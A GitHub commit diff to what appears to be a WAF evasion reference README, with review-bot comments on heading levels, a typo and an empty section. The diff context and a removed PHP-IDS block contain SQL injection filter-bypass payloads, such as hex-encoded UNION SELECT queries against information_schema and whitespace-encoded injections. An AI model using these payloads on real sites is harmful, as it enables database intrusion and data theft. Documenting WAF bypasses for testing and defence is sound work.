Update README.md

Infected Drake 2019-02-08 18:56:46 +05:30 committed by GitHub
parent 72469e0cb0
commit f9a21ed5ba
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23


@ -1337,10 +1337,10 @@ Wanna detect WAFs? Lets see how.
</tr> </tr>
</table> </table>
## Evasion Techniques # Evasion Techniques
Lets look at some methods of bypassing and evading WAFs. Lets look at some methods of bypassing and evading WAFs.
### Fuzzing/Bruteforcing: ## Fuzzing/Bruteforcing:
#### Method: #### Method:
Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists: Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
- Wordlists specifically for fuzzing - [Seclists Fuzzing](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing). - Wordlists specifically for fuzzing - [Seclists Fuzzing](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing).
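Review bot: The `#### Method:` line under Fuzzing/Bruteforcing is left at level 4 while its parent moves from `###` to `##`, so the outline now jumps from h2 straight to h4. The next hunk moves the Regex-Reversing `Method:` heading to `###`; do the same here so both technique sections share one hierarchy. Promoting `Evasion Techniques` to `#` also makes it a second top-level heading in the README, which is worth confirming against the table of contents and any anchor links.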
@ -1358,14 +1358,16 @@ __Drawback:__
- This method often fails. - This method often fails.
- Many a times your IP will be blocked (temporarily/permanently). - Many a times your IP will be blocked (temporarily/permanently).
### Regex-Reversing: ## Regex-Reversing:
#### Method: ### Method:
- Most efficient method of bypassing WAFs. - Most efficient method of bypassing WAFs.
- Some WAFs rely upon matching the attack payloads with the signatures in their databases. - Some WAFs rely upon matching the attack payloads with the signatures in their databases.
- Payload matches the reg-ex the WAF triggers alarm. - Payload matches the reg-ex the WAF triggers alarm.
#### Techniques: #### Techniques:
__Scenario 1: SQL Injection__
##### • Step 1: ##### • Step 1:
__Keyword filer__: `and`, `or`, `union` __Keyword filer__: `and`, `or`, `union`
__Possible PHP Filter Code__: `preg_match('/(and|or|union)/i', $id)` __Possible PHP Filter Code__: `preg_match('/(and|or|union)/i', $id)`
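Review bot: Sibling headings under Regex-Reversing end up at different levels: `Method:` becomes `###` but `#### Techniques:` stays at h4 and `##### • Step 1:` at h5. Promote those by one level as well. The added `__Scenario 1: SQL Injection__` line is bold text sitting between an h4 and an h5 heading; make it a real heading (for example `#### Scenario 1: SQL Injection`) so the steps nest under it and it gets an anchor. While touching this block, `Keyword filer` in the Step 1 line should read `Keyword filter`.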
@ -1423,24 +1425,6 @@ __Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group b
- __Filtered Injection__: `1 || lpad(user,7,1)` - __Filtered Injection__: `1 || lpad(user,7,1)`
- __Bypassed Injection__: `1%0b||%0blpad(user,7,1)` - __Bypassed Injection__: `1%0b||%0blpad(user,7,1)`
---
__PHP-IDS__ generally blocks input containing `=` or `(` or `'` following with any a string or integer e.g. `1 or 1=1`, `1 or '1'`, `1 or char(97)`. However, it can be bypassed using a statement that does not contain `=`, `(` or `'` symbols.
#### Scenario 1:
- __Filtered Injection__: `1 or 1 = 1`
- __Bypassed Injection__: `1 or 1`
#### Scenario 2:
- __Filtered injection__: `1 union select 1, table_name from information_schema.tables where table_name = 'users'`
- __Filtered Injection__: `1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'`
- __Filtered Injection__: `1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)`
- __Bypassed Injection__: `1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a`
- __Bypassed Injection__: `1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273`
__Drawbacks:__
- This method is time consuming.
## Google Dorks Approach: ## Google Dorks Approach:
## Known Bypasses: ## Known Bypasses:
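Review bot: The removal at the end of Regex-Reversing takes out the `__Drawbacks:__` list together with the PHP-IDS block, while the Fuzzing section above still keeps its `__Drawback:__` list, so the two techniques are no longer documented symmetrically. If the PHP-IDS material is being relocated (for instance under `## Known Bypasses:`), say so in the commit message, which currently reads only "Update README.md"; if it is being dropped, keep the drawbacks note. After this change `## Google Dorks Approach:` is followed directly by `## Known Bypasses:` with no content, and both now sit as children of the promoted `# Evasion Techniques`; either fill in the section or drop the empty heading.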
@ -1649,4 +1633,4 @@ whatwaf -u <target> --ra --throttle 2
- [Protocol Level WAF Evasion Techniques](presentations/BlackHat%20US%2012%20-%20Protocol%20Level%20WAF%20Evasion%20(Slides).pdf) - A presentation at about efficiently evading WAFs at protocol level from [BlackHat US 12](https://www.blackhat.com/html/bh-us-12/). - [Protocol Level WAF Evasion Techniques](presentations/BlackHat%20US%2012%20-%20Protocol%20Level%20WAF%20Evasion%20(Slides).pdf) - A presentation at about efficiently evading WAFs at protocol level from [BlackHat US 12](https://www.blackhat.com/html/bh-us-12/).
- [Analysing Attacking Detection Logic Mechanisms](presentations/BlackHat%20US%2016%20-%20Analysis%20of%20Attack%20Detection%20Logic.pdf) - A presentation about WAF logic applied to detecting attacks from [BlackHat US 16](https://www.blackhat.com/html/bh-us-16/). - [Analysing Attacking Detection Logic Mechanisms](presentations/BlackHat%20US%2016%20-%20Analysis%20of%20Attack%20Detection%20Logic.pdf) - A presentation about WAF logic applied to detecting attacks from [BlackHat US 16](https://www.blackhat.com/html/bh-us-16/).
- [WAF Bypasses and PHP Exploits](presentations/WAF%20Bypasses%20and%20PHP%20Exploits%20(Slides).pdf) - A presentation about evading WAFs and developing related PHP exploits. - [WAF Bypasses and PHP Exploits](presentations/WAF%20Bypasses%20and%20PHP%20Exploits%20(Slides).pdf) - A presentation about evading WAFs and developing related PHP exploits.
- [Playing Around with WAFs](presentations/Playing%20Around%20with%20WAFs.pdf) - A small presentation about WAF profiling and playing around with them from [Defcon 16](http://www.defcon.org/html/defcon-16/dc-16-post.html). - [Playing Around with WAFs](presentations/Playing%20Around%20with%20WAFs.pdf) - A small presentation about WAF profiling and playing around with them from [Defcon 16](http://www.defcon.org/html/defcon-16/dc-16-post.html).
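Review bot: No visible text differs between the old and new side of this hunk, so the change on the last entry is presumably whitespace or the end-of-file newline; if that is intentional, it would be cleaner as its own commit. Since the list is being touched, the first entry still reads "A presentation at about efficiently evading WAFs" (drop "at"), and the Defcon 16 link uses `http://` while the Black Hat links use `https://`.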